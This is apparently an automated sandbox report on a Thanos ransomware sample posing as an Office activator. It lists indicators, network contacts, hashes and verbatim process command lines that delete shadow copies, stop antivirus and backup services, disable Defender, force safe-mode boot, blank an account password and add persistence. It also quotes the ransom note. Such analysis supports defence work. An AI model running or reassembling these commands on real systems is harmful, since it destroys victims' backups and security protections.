Malware Analysis Report

2024-11-13 15:33

Sample ID 241108-xq3m4awrfw
Target OfficeActivator.exe
SHA256 8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d
Tags
thanos defense_evasion evasion persistence ransomware discovery execution impact trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d

Threat Level: Known bad

The file OfficeActivator.exe was found to be: Known bad.

Malicious Activity Summary

thanos defense_evasion evasion persistence ransomware discovery execution impact trojan

Modifies Windows Defender Real-time Protection settings

Modifies WinLogon for persistence

Thanos executable

Disables service(s)

Contains code to disable Windows Defender

Thanos family

Renames multiple (60) files with added filename extension

Deletes shadow copies

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Impair Defenses: Safe Mode Boot

Drops startup file

Windows security modification

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

Enumerates connected drives

Launches sc.exe

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Interacts with shadow copies

Runs ping.exe

Modifies registry key

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 19:04

Signatures

Contains code to disable Windows Defender

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Thanos executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Thanos family

thanos

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 19:04

Reported

2024-11-08 19:04

Platform

win7-20240903-en

Max time kernel

3s

Max time network

4s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"

Signatures

Contains code to disable Windows Defender

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Modifies WinLogon for persistence

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\OfficeActivator.exe,C:\\Windows\\system32\\userinit.exe" | C:\Windows\system32\reg.exe | N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description | Indicator | Process | Target
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A (35 identical rows)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2380 wrote to memory of 1920 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\system32\reg.exe (3 identical rows)
PID 2380 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\system32\bcdedit.exe (3 identical rows)
PID 2380 wrote to memory of 2544 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\system32\reg.exe (3 identical rows)
PID 2380 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\system32\net.exe (3 identical rows)
PID 2380 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\system32\shutdown.exe (3 identical rows)
PID 2360 wrote to memory of 2320 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe (3 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe

"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"

C:\Windows\system32\reg.exe

"reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f

C:\Windows\system32\bcdedit.exe

"bcdedit.exe" /set {default} safeboot network

C:\Windows\system32\reg.exe

"reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe","C:\Windows\system32\userinit.exe" /f

C:\Windows\system32\net.exe

"net.exe" user Admin ""

C:\Windows\system32\shutdown.exe

"shutdown.exe" /r /t 0

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user Admin ""

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/2380-0-0x000007FEF5BA3000-0x000007FEF5BA4000-memory.dmp

memory/2380-1-0x00000000002B0000-0x00000000002CA000-memory.dmp

memory/2380-2-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

memory/2380-3-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

memory/2756-4-0x0000000002D90000-0x0000000002D91000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 19:04

Reported

2024-11-08 19:06

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"

Signatures

Contains code to disable Windows Defender

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Disables service(s)

evasion execution

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (60) files with added filename extension

ransomware

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\mshta.exe | N/A (2 identical rows)

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A
File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A (2 identical rows)

Modifies WinLogon

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A

Launches sc.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A (4 identical rows)

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A (3 identical rows)

Runs net.exe

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A (64 identical rows)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A (3 identical rows)
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1524 wrote to memory of 432 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 identical rows)
PID 1524 wrote to memory of 4900 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 2592 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 4660 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3608 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3964 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 2600 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 2612 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3820 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 2224 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 1676 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3984 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 4044 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 5064 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 4420 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3628 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 224 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 232 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3932 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3372 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3332 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 4572 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 868 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 2124 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 4768 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 3524 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)
PID 1524 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | C:\Windows\SYSTEM32\net.exe (2 identical rows)

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe

"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 www.poweradmin.com udp
US 52.1.55.52:443 www.poweradmin.com tcp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 52.55.1.52.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 cutewallpaper.org udp
US 104.21.37.179:443 cutewallpaper.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 179.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 69.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

memory/1524-0-0x0000000000B90000-0x0000000000BAA000-memory.dmp

memory/1524-1-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp

memory/1524-2-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp

memory/432-3-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp

memory/432-13-0x000001539DDB0000-0x000001539DDD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mltuvifn.yto.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/432-16-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp

C:\ProgramData\Microsoft\User Account Pictures\HOW_TO_DECYPHER_FILES.txt

MD5 00dd1d8e8756229b0e703bcca9c8fa87
SHA1 97412aab7aa0663cd7bf7803549c5507834cfdf6
SHA256 6d4eabdf7bf6a550fed6004e1636053785b0e877f00e8d624af2f4989a544ae4
SHA512 14f3de03ad13eaf8e9ec5175c003a2f4e585ed128a724cbc7c446c717970613f6042ad286f91126391ca7574b9d4610a7ca4e97a77167e7a4247d7e21297f028

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5 a08c7c1f9d09a5e493729ff3523b3485
SHA1 d8392f27046921e1d9c32120b683f207e6f2821d
SHA256 d066f2aeebe7aae32e12b412b505b4528215bce7d9c4efb054450fb0c471d2ad
